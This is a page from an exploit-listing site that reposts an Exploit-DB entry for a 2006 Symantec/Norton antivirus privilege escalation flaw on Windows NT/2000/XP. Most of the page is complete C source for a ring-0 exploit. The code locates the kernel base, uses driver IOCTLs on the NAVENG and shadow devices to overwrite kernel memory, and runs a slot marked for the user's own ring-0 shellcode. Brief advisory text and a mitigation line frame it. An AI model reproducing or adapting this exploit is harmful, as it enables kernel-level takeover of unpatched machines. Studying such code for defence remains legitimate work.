Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Symantec AntiVirus Privilege Escalation Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
Symantec AntiVirus, Norton Antivirus
by:
Rubén Santamarta
7.5
CVSS
HIGH
Privilege Escalation
119
CWE
Product Name: Symantec AntiVirus, Norton Antivirus
Affected Version From: Symantec and Norton antivirus products running on Microsoft Windows NT, Windows 2000, and Windows XP
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:symantec:antivirus:-,cpe:/a:symantec:norton_antivirus:-
Metasploit:
Other Scripts:
Platforms Tested: Windows NT, Windows 2000, Windows XP
2006

Symantec AntiVirus Privilege Escalation Vulnerability

Local attackers can exploit this issue to corrupt memory and execute arbitrary code with kernel-level privileges. Successful exploits may facilitate a complete system compromise.

Mitigation:

Update to the latest version of Symantec and Norton antivirus products.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/20360/info
 
// Symantec AntiVirus is prone to a privilege-escalation vulnerability.
 
// Local attackers can exploit this issue to corrupt memory and execute arbitrary code with kernel-level privileges. Successful exploits may facilitate a complete system compromise.
 
// This issue affects only Symantec and Norton antivirus products running on Microsoft Windows NT, Windows 2000, and Windows XP.

/////////////////////////////////////////////
///// Norton Internet Security          /////
/////////////////////////////////////////////
//// For educational purposes ONLY
/////////////////////////////////////////////
//// Ring0 xploit
//// Rub�n Santamarta 
//// www.reversemode.com
//// 26/08/2006
////////////////////////////////////



#include <windows.h>
#include <stdio.h>



#define WXP_USERPROBE 0x87E34
#define W2K_USERPROBE 0x81B1C

#define WXP_EXCEPTION 0x16F120
#define W2K_EXCEPTION 0x944b6

typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
									DWORD ,
									LPDWORD);

typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
									LPTSTR lpBaseName,
									DWORD nSize);
									
									
DWORD CalcJump(DWORD BaseNt,BOOL InXP,DWORD *hValue,DWORD *ShellAddr)
{

      DWORD SumTemp,IniAddress,i,sumAux,addTemp,OffWord;
	  
	  if(InXP)
	  {
		SumTemp=BaseNt+WXP_EXCEPTION+0xE;
	    OffWord=0x64B8;
	  }
	  else
	  {
	    SumTemp=BaseNt+W2K_EXCEPTION+0xE;
		OffWord=0x5358;
	  }

  
	  for(i=0x4c;i<0xDDDC;i=i+4)
	  {   
		sumAux=~((i*0x10000)+OffWord);
		addTemp=SumTemp-sumAux;
		if(addTemp>0xE000000 && addTemp<0xF000000){
				IniAddress=addTemp&0xFFFFF000;
				*hValue=i-4;
				*ShellAddr=addTemp;
				break;
		}
	  }
	  printf("\nINFORMATION \n");
	  printf("-----------------------------------------------------\n");
      printf("Patched ExRaiseAccessViolation pointing to \t [0x%p]\n",addTemp-1);
      printf("0xF000h bytes allocated  at \t\t [0x%p]\n",IniAddress);
      printf("Magic Value\t\t\t	 [0x%p]\n\n",i-4);
	  
      return (IniAddress);
} 
									
VOID ShowError()
{
 LPVOID lpMsgBuf;
 FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
               NULL,
               GetLastError(),
               MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
               (LPTSTR) &lpMsgBuf,
               0,
               NULL);
 MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
 exit(1);
}

int main(int argc, char *argv[])
{

 DWORD				*OutBuff,*InBuff,Ring0Addr,mmUserProbe;			
 DWORD				dwIOCTL,OutSize,InSize,junk,cb,devNum,i,ShellAddr,hValue;
 HANDLE				hDevice;
 PENUMDEVICES pEnumDeviceDrivers;
 PGETDEVNAME  pGetDeviceDriverBaseName;
 LPVOID arrMods[200],addEx;
 DWORD BaseNt=0,BaseAuxNt;
 BOOL InXP;
 CHAR baseName[MAX_PATH];
 unsigned char Ring0ShellCode[]="\xcc";       //"PUT YOUR RING0 CODE HERE "
 
  system("cls");
 
  printf("\n################################\n");
  printf("## Norton I.S                 ##\n");
  printf("## Ring0 Exploit              ##\n");
  printf("################################\n");
  printf("\nRuben Santamarta\nwww.reversemode.com\n\n");
 
 if(argc<2)
 {
  
 
  printf("\nusage> exploit.exe <XP> or <2K>\n");
  exit(1);
 }
 

 pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
												 "EnumDeviceDrivers");

 pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
												 "GetDeviceDriverBaseNameA");

 pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
 devNum=cb/sizeof(LPVOID);
 printf("\n[!] Searching Ntoskrnl.exe Base Address...");

 for(i=0;i<=devNum;i++)
 {
       pGetDeviceDriverBaseName(arrMods[i],baseName,MAX_PATH);
	   if((strncmp(baseName,"ntoskr",6)==0))
	   {
	  	   printf("[%x] Found!\n",arrMods[i]);
		   BaseNt = (DWORD)arrMods[i];
		   BaseAuxNt=BaseNt;
	   }
 }
 
if (!BaseNt) 
{
   printf("!!? ntoskrnl.exe base address not found\nexiting\n\n");
   exit(0);
}

  if(strncmp(argv[1],"XP",2)==0) InXP = TRUE;
  else                           InXP = FALSE;



////////////////////////////////////// 
//////  STAGE 1
//////////////////////////////////////

if(InXP)    BaseNt += WXP_USERPROBE;
else      BaseNt += W2K_USERPROBE;

 
 //////////////////////
///// CASE 'DosDevice'
//////////////////////

hDevice = CreateFile("\\\\.\\NAVENG",
                     0,
                     0,
                     NULL,
                     3,
                     0,
                     0);
 
 if (hDevice == INVALID_HANDLE_VALUE) ShowError();
 printf("\n\n** Initializing Exploit\t[Stage 1]\n\n");
 printf("\nINFORMATION \n");
  printf("-----------------------------------------------------\n");
 printf("[!] NAVENG Device Handle [%x]\n",hDevice);
 
//////////////////////
///// BUFFERS
//////////////////////
 OutSize = 4;
 OutBuff = malloc(sizeof(DWORD));
 
 //////////////////////
 ///// IOCTL
 //////////////////////

 dwIOCTL = 0x222ADB;

 DeviceIoControl(hDevice, 
                 dwIOCTL, 
                 (LPVOID)0,0,
                 (LPVOID)OutBuff,OutSize,
                 &junk,  
                 NULL);
                 
 printf("[!] mmUserProbeAddress current value:\t[0x7FFF0000]\n");        
 printf("[!] Overwriting mmUserProbeAddress at:\t[0x%x] \n",BaseNt);
 printf("[!] mmUserProbeAddress current value:\t[0x%x]\n",OutBuff[0]);
 printf("[*] ProbeForWrite now checking for values greater than 0x%x\n\n",OutBuff[0]);
                
 DeviceIoControl(hDevice, 
                 dwIOCTL, 
                 (LPVOID)0,0,
                 (LPVOID)BaseNt,OutSize,
                 &junk,  
                 NULL);
 mmUserProbe=OutBuff[0];
 free((LPVOID)OutBuff);
 CloseHandle(hDevice);


//////////////////////
///// STAGE 2
//////////////////////

 BaseNt = BaseAuxNt;
 /////////////////////////
 printf("\n\n** Initializing Exploit\t[Stage 2]\n\n");
 
 addEx=(LPVOID)CalcJump(BaseNt,InXP,&hValue,&ShellAddr);
 OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
 
 if(!OutBuff) ShowError();
 

 InBuff=OutBuff;
 
 printf("[!] Checking Shadow Device...");
 hDevice = CreateFile("\\\\.\\shadow",
                    GENERIC_READ|GENERIC_WRITE,
                    0,
                    0,
                    OPEN_EXISTING,
                    0,
                    NULL);
  
 if (hDevice == INVALID_HANDLE_VALUE) ShowError();
 printf("[OK]\n");
 
 printf("[!] Exploiting Shadow Device...\n");

 while(OutBuff[3]< hValue)
  {
			DeviceIoControl(hDevice,      // "\\.\shadow"
                            0x141043,  // Privileged IOCTL
                            InBuff, 2,    // InBuffer, InBufferSize
                            OutBuff, 0x18,// OutBuffer,OutBufferSize
                            &junk,        // bytes returned
                            (LPOVERLAPPED) NULL);
  
  printf("\r\t[->]VALUES: (%x)",OutBuff[3]);
  }

  if(InXP)  Ring0Addr = BaseNt + WXP_EXCEPTION;
  else  	Ring0Addr = BaseNt + W2K_EXCEPTION; 
  
  printf("\n[!] Overwriting ExRaiseAccessViolation at [0x%x]...",Ring0Addr+0xC);
  DeviceIoControl(hDevice,      // "\\.\shadow"
                            0x141043,  // Privileged IOCTL
                            InBuff, 2,    // InBuffer, InBufferSize
                            (LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x
                            &junk,        // bytes returned
                            (LPOVERLAPPED) NULL);
   
 
   printf("[OK]");
   printf("\n\n\t\t[!] Initializing Countdown,last chance to abort.");
   
   for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090; // paged out
   memcpy((LPVOID)ShellAddr,(LPVOID)Ring0ShellCode,sizeof(Ring0ShellCode));
   
   for(i=10;i>=1;i--)
   {
    printf("\r -[ %d ]- ",i);
    if(i==1) printf("\n\n[*] Executing ShellCode");
    Sleep(1000);
   }
  
   DeviceIoControl(hDevice,      
                   0x141043,  
                   InBuff, 2,   
                   (LPVOID)mmUserProbe+0x1000, 0x18,
                   &junk,       
                   (LPOVERLAPPED) NULL);
   
   
   CloseHandle(hDevice);
   
   printf("\n\n[*] Exploit terminated\n\n");


 /////////////////////
 ///// CLeanUp
 /////////////////////

   free(OutBuff);
   
   return 0;
}

Navigation

Suggest Exploit

Services By CQR